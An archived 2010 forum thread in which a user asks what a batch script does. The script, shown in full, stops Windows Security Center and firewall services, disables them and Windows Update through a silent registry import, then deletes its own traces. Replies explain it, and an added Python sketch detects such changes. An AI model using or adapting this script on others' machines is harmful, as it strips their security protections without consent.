implague Posted May 2, 2010

Hi, friends. Yesterday one of my friends sent me a file and told me this file can remotely shut down the firewall of the victim's computer. Code as follows:

    net stop "Security center"
    net stop SharedAccess
    > "%Temp%.kill.reg" ECHO REGEDIT4
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\Controlset001\services\wscsvc]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    START /WAIT REGEDIT /S "%Temp%.kill.reg"
    del "%Temp%.kill.reg"
    del %0

"Make a .bat with this code and run it." So I did this on my VMware machine, but nothing happens, but the bat file is gone and merged somewhere. I guess it is in the registry, but I would like to know where it goes, so I posted it here to get more efficient people's opinion. So guys, please do help me and let me know what exactly this is. Sorry for my bad English, but please do help me.

HX1 Posted May 2, 2010

In which environment did you run this... yours... or was it physically in the VM?

CODYQX4 Posted May 2, 2010

Well, I don't know if this actually is written properly, but it looks like it tries to disable Security Center, Internet Connection Sharing, and Windows Update. I don't know if Windows Firewall needs SC running to work. I think you could adjust it to kill the service, but you need to get it on the PC (virus/malware) in the first place.

This will only work on XP if it succeeds, as the SharedAccess is ICS/WF and they are separate services in Vista/7.

PS: This is why you shouldn't rely on MS crap for security, any decent security solution should prevent crap like this from easily killing this.

In Norton, you cannot shut down the NIS service through bat or conventional means, though I think you can set it to disabled and it would be screwed at next boot, assuming NIS doesn't flip out about a bat screwing with its service config, and I don't think it will, since I use .bat files like this to quickly disable unnecessary crap but reverse the change easily.
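
Added example, not part of the thread: a static triage sketch in Python that rebuilds the .reg content a batch file like the posted one writes through redirected ECHO lines, then reports which of the services discussed above it sets to Start=4 (disabled). The function names, the WATCHED table and the sample text are assumptions made for illustration.

```python
import re

# Services named in the thread, with the roles the reply gives them on XP.
WATCHED = {"sharedaccess": "Windows Firewall / ICS", "wuauserv": "Windows Update",
           "wscsvc": "Security Center"}
REDIR = re.compile(r'^\s*>{1,2}\s*(?:"[^"]*"|\S+)\s+ECHO(?:\.\s*|\s+(?P<text>.*))$', re.I)
KEY = re.compile(r'^\[(?P<path>[^\]]+)\]$')
START = re.compile(r'^"Start"=dword:(?P<val>[0-9a-f]{8})$', re.I)

def reg_lines(batch_text):
    """Rebuild the .reg content the batch file writes via redirected ECHO."""
    out = []
    for line in batch_text.splitlines():
        m = REDIR.match(line)
        if m:
            out.append((m.group("text") or "").strip())  # "ECHO." gives a blank line
    return out

def disabled_services(batch_text):
    """Return {service: role} for watched services whose Start is set to 4 (disabled)."""
    findings, service = {}, None
    for line in reg_lines(batch_text):
        k = KEY.match(line)
        if k:
            parts = k.group("path").split("\\")
            # Only keys of the form ...\Services\<name> describe a service.
            is_service = len(parts) >= 2 and parts[-2].lower() == "services"
            service = parts[-1].lower() if is_service else None
            continue
        s = START.match(line)
        if s and service in WATCHED and int(s.group("val"), 16) == 4:
            findings[service] = WATCHED[service]
    return findings

# Constructed sample: lines in the style of the posted script, plus one
# unrelated service entry (Spooler, Start=2) that must not be flagged.
SAMPLE = r'''
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000002
START /WAIT REGEDIT /S "%Temp%.kill.reg"
'''

if __name__ == "__main__":
    for name, role in disabled_services(SAMPLE).items():
        print(f"{name}: Start=4 (disabled) -> {role}")
```

Because the posted script deletes both the temporary .reg file and itself, the changed Start values under the service keys are what remains to check on the machine.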
This topic is now archived and is closed to further replies.